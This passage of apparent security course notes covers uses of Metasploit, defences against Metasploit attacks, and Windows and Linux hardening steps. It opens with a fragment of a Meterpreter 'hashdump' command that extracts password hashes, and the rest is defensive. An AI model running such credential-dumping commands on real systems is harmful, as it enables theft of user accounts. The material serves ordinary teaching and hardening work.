hashdump # Extract password hashes

Applications of Metasploit Framework


1. Penetration Testing – Helps security professionals find and exploit vulnerabilities.
2. Red Team Operations – Simulates real-world attacks to test defenses.
3. Malware Research – Assists researchers in analyzing malicious code.
4. Security Awareness Training – Used in ethical hacking courses.
5. Automated Security Audits – Scans networks and applications for security flaws.

Defensive Measures Against Metasploit Attacks


1. Regular Software Updates – Patch known vulnerabilities.
2. Firewall & IDS/IPS – Block unauthorized connections and detect suspicious activity.
3. Disable SMBv1 – Prevents EternalBlue-style attacks.
4. Use Strong Authentication – Protects against brute-force attacks.
5. Monitor Network Traffic – Identifies unusual outbound connections.

Demonstration of Windows and Linux OS Hardening

Operating System (OS) hardening is the process of securing a system by reducing its
vulnerabilities. It involves modifying default configurations, removing unnecessary programs or
services, applying updates, and implementing security features to ensure that the system is less
prone to attacks. This process plays a vital role in protecting both Windows and Linux systems
from various threats including malware, unauthorized access, and system exploitation.

In Windows OS, hardening begins with keeping the system up to date. Applying regular
Windows updates and installing security patches helps fix known vulnerabilities. Enabling
Windows Defender provides real-time protection against viruses, spyware, and other malware.
Along with this, Windows Firewall should be configured to restrict unauthorized access by
defining inbound and outbound rules based on specific needs.

Another critical aspect of Windows hardening is managing user privileges. Enforcing User
Account Control (UAC) ensures that administrative privileges are granted only when necessary.
The use of strong and complex passwords, account lockout policies after multiple failed login
attempts, and disabling default administrative accounts add extra layers of security. Group Policy
Editor (gpedit.msc) can be used to enforce system-wide security policies, such as password
expiration, USB access control, and software restriction.

System services and features that are not in use should be disabled using services.msc to
minimize attack surfaces. Audit policies and security logs should be enabled through the Event
Viewer to monitor suspicious activities. Moreover, enabling BitLocker ensures that sensitive data
on the hard drive is encrypted, preventing unauthorized access if the device is stolen or
compromised.

In Linux OS, hardening starts with regular updates and upgrades. The use of package
managers like apt or yum ensures the installation of the latest security patches. Unnecessary
services should be disabled using system management tools like systemctl. For example, disabling
services such as Bluetooth, Telnet, or FTP, if they are not required, helps reduce potential entry
points for attackers.

Secure SSH configuration is another important step in Linux hardening. This includes
changing the default SSH port, disabling root login via SSH, and restricting access to specific
users. Configuration files like /etc/ssh/sshd_config can be edited to apply these settings. Setting
correct file permissions using commands like chmod, chown, and defining appropriate umask
values ensures that users cannot access or modify files they don’t own.

Linux systems should also employ firewall rules using tools such as UFW (Uncomplicated
Firewall) or iptables. These firewalls help control incoming and outgoing network traffic.
Additionally, security tools like Fail2Ban help monitor login attempts and block IPs that show
malicious behavior, while ClamAV can be used for antivirus scanning.

User management is also critical in Linux. Unused users and groups should be deleted, and
the principle of least privilege must be followed. Logs located in /var/log/ directories should be
monitored regularly to detect anomalies. Tools such as auditd, chkrootkit, and logwatch can help
in monitoring and intrusion detection.

In conclusion, both Windows and Linux OS hardening aim to protect systems from
unauthorized access, data breaches, and malware attacks. The key practices include applying
updates, managing users and permissions, configuring firewalls, disabling unused services, and
monitoring system activities. Regularly reviewing security settings and adapting to new threats is
essential in maintaining a secure and robust operating environment.
